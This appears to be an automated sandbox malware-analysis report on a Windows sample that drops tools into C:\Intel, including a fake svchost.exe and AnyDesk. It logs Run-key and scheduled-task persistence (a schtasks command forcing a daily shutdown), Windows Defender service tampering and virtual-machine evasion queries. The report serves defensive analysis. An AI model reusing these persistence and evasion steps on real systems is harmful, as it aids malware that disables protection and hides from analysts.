    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: attrib.exeJump to behavior
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\unins000.exeJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\Trays.exeJump to dropped file
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeFile created: C:\Intel\curl.exeJump to dropped file
    Source: C:\Intel\curl.exeFile created: C:\Intel\driver.exeJump to dropped file
    Source: C:\Intel\curl.exeFile created: C:\Intel\blat.exeJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\ShellEh6055.dllJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\ShellEh6055x64.dllJump to dropped file
    Source: C:\Intel\curl.exeFile created: C:\Intel\dc.exeJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\4t-min64.exeJump to dropped file
    Source: C:\Intel\svchost.exeFile created: C:\Intel\AnyDesk\AnyDesk.exeJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\7z.dllJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\delReg.exeJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\Tray.dllJump to dropped file
    Source: C:\Intel\curl.exeFile created: C:\Intel\svchost.exeJump to dropped file
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\license.txt
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\readme.txt

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00
    Source: C:\Intel\dc.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDefend
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Video ConfigurationsJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Video ConfigurationsJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Intel\svchost.exeFile opened: C:\Intel\AnyDesk\AnyDesk.exe:Zone.Identifier read attributes | delete
    Source: C:\Intel\AnyDesk\AnyDesk.exeFile opened: C:\Intel\AnyDesk\AnyDesk.exe:Zone.Identifier read attributes | delete
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Intel\curl.exeCode function: 34_2_002C4214 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,34_2_002C4214
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Intel\driver.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\Trays\Trays.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Intel\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\dc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\dc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Intel\dc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Found stalling execution ending in API Sleep call
    Source: C:\Intel\curl.exeStalling execution: Execution stalls by calling Sleepgraph_34-120808
    Queries memory information (via WMI often done to detect virtual machines)
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive
    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE PhysicalAdapter = TRUE
    Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
    Uses ping.exe to sleep
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 6 127.0.0.1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9926
    Source: C:\Intel\driver.exeDropped PE file which has not been started: C:\Intel\Trays\unins000.exeJump to dropped file
    Source: C:\Intel\curl.exeDropped PE file which has not been started: C:\Intel\blat.exeJump to dropped file
    Source: C:\Intel\driver.exeDropped PE file which has not been started: C:\Intel\Trays\ShellEh6055.dllJump to dropped file
    Source: C:\Intel\driver.exeDropped PE file which has not been started: C:\Intel\Trays\ShellEh6055x64.dllJump to dropped file
    Source: C:\Intel\driver.exeDropped PE file which has not been started: C:\Intel\Trays\7z.dllJump to dropped file
    Source: C:\Intel\driver.exeDropped PE file which has not been started: C:\Intel\Trays\delReg.exeJump to dropped file
    Source: C:\Intel\driver.exeDropped PE file which has not been started: C:\Intel\Trays\Tray.dllJump to dropped file
    Source: C:\Intel\curl.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_34-118398
    Source: C:\Intel\svchost.exe TID: 5996Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Intel\svchost.exe TID: 5688Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Intel\svchost.exe TID: 1188Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Intel\svchost.exe TID: 6492Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Intel\svchost.exe TID: 1924Thread sleep time: -30000s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 2264Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 488Thread sleep time: -30000s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 6848Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 2264Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 3280Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 3008Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 7988Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Intel\AnyDesk\AnyDesk.exe TID: 5220Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6884Thread sleep count: 9926 > 30
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
    Source: C:\Intel\curl.exeCode function: 34_2_002CCD06 FindFirstFileExW,GetDriveTypeW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,FindClose,GetLastError,FindClose,34_2_002CCD06
    Source: C:\Intel\curl.exeCode function: 34_2_002CFCDD FindFirstFileExW,GetDriveTypeW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,FindClose,GetLastError,FindClose,34_2_002CFCDD
    Source: C:\Intel\driver.exeCode function: 40_2_0040F8BC FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,40_2_0040F8BC
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407C0E FindFirstFileA,41_2_00407C0E
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_0040DB44 FindFirstFileA,41_2_0040DB44
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_0040DDDC FindFirstFileA,41_2_0040DDDC
